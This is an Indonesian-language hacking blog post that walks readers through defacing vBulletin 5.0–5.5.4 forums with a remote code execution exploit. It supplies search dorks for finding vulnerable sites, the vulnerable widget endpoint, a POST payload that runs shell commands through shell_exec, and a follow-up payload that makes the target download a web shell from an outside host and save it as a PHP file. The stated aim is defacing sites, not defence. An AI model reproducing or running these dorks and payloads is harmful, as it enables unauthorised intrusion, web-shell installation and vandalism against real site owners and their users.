vBulletin forum to RCE for version 5.0.* - 5.5.4 (Manual Version)

» » vBulletin forum to RCE for version 5.0.* - 5.5.4 (Manual Version)

Selasa, 01 Oktober 2019

vBulletin forum to RCE for version 5.0.* - 5.5.4 (Manual Version)

   Oktober 01, 2019      

wokee welcome back with me orang yg paling gans, disini gw bakal ngasih tau cara deface dengan poc vBulletin forum to RCE manual yg lagi buming di dunia underground oke langsung saja pertama kalian ngedork dolo lah neh dork nya..

Dorks :

  • intext:"Powered By vBulletin Version 5.5.4"
  • inurl:"/forum" intext:"Powered By vBulletin Version 5.0.*"
Payload :

  • http://site.coli/ajax/render/widget_php 
oke di sini gw manual yah gak make tools karna gw gak suka yang singkat singkat :3, jika kalian udah dapet web targetnya kalian kasih payload nya kita liat itu web vuln apa kga..

jika sudah di kasih payload maka akan muncul Incorrect HTTP Method yg berarti HTTP Metode GET ndak bisa mesti HTTP Metode POST, sekarang kalian buka mozilla kalian dan buka HACKBAR nya


Jika syudah kalian centangkan pada Post dan pastekan payload ini...

widgetConfig[code]=echo shell_exec('uname -a'); exit;
jika sudah kalian coba coba menggantikan command nya contoh uname -a , id , pwd dll


jika berhasil tinggal kalian execution dengan uploadkan shell / uploader kalian dan ini payloadnya..

widgetConfig[code]=echo shell_exec('wget http://site.coli/shell.txt -O p.php'); exit;

nah jika sudah kalian bisa akses deh biasanya akses tersebut di DOCUMENT_ROOT atau HTTP://SITE.COM/AKSES.PHP.

Oke sekian terimakasih

   / /

   No Comments

di Oktober 01, 2019

0 komentar :

Posting Komentar

Langganan: Posting Komentar ( Atom )